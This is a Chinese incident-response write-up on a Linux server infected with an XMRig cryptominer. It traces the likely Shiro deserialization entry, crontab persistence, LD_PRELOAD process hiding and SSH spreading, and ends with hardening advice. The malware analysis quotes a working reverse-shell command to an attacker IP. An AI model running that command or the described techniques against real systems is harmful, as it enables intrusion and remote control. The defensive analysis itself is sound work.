记一次CPU告警挖矿事件应急响应
01 事件背景介绍
某单位服务器存在CUP资源异常占用情况,现需对该情况进行排查。
02 定位挖矿主机
由于明确存在CPU资源异常占用的主机,所以先行对该台主机进行上机排查。
03 挖矿主机分析
查看系统账号情况,未发现系统可疑、后门账号。
查看系统安全日志,在系统日志secure中发现近日SSH登录痕迹,确认后不存在异常登录情况。
查看系统计划任务,在服务器计划任务中发现可疑任务。
04 病毒样本分析
根据计划任务,下载病毒样本,分析恶意代码可知存在以下攻击行为:
1、下载采用XMRig编译的挖矿木马hxxp://w.apacheorg.top:1234/.libs。
2、通过Linux动态链接库LD_PRELOAD劫持加载恶意.so文件libs.so,libs.so hook readdir函数对指定进程进行隐藏。
3、通过创建crontab定时任务、写入启动项方式维持控制。
4、被控制机器反弹shell连接到控制端198.46.202.146:8899
nohup bash -i >& /dev/tcp/198.46.202.146/8899 0>&1 &
5、从/.ssh/known_hosts中获取已认证的远程主机ID,与对应的主机建立SSH连接并执行命令下载恶意脚本xms。
6、清理入侵痕迹。
根据样本分析结果,到相关路径下发现确实存在恶意so文件等,进一步确认该台服务器已被入侵,并植入挖矿病毒。
其主要被控制行为有:连接黑客控制的服务器建立shell、接受黑客远程控制、安装门罗币挖矿木马、劫持Linux库文件加载过程劫持libs.so文件,Hook Readdir函数对木马进程进行隐藏、创建定时任务、启动项进行持久化。
05 入侵路径梳理
通过上述分析,已明确该主机被植入挖矿病毒,现对主机进行入侵痕迹排查,排查发现:
该台主机的443端⼝对公网开放,并且使用了shiro认证框架。猜测攻击者有可能使⽤了shiro反序列化漏洞获取服务器权限,于是进行漏洞验证。
发现存在可利用的shiro漏洞组件,利用该漏洞能root权限远程命令执行。
由于应用服务器未开启Web日志记录,仅能大概推断攻击者直接利⽤shiro反序列化漏洞植⼊了病毒样本。
推断攻击者攻击路径为:
1、利用shiro服务漏洞攻击,植入恶意Payload执行恶意命令进而入侵系统。
2、执行恶意命令下载挖矿木马,僵尸网络木马,爆破攻击程序。
3、劫持Linux库文件加载libs.so,Hook Readdir函数隐藏木马进程。
4、创建定时任务、系统启动项。
5、反弹shell连接控制端。
6、挖矿程序不间断的工作,导致系统CPU负载过大,大量消耗主机CPU资源,严重影响主机正常服务运行,导致主机有系统崩溃风险。
06 安全加固建议
1、升级shiro组件至最新版本,且修改默认密钥。
2、及时清除病毒程序创建的定时任务、系统启动项。
3、及时修改系统账号与密码。
4、在边界防火墙对矿池IP进行封禁,禁止内网服务器访问矿池IP。
- 点赞
- 收藏
- 关注作者
评论(0)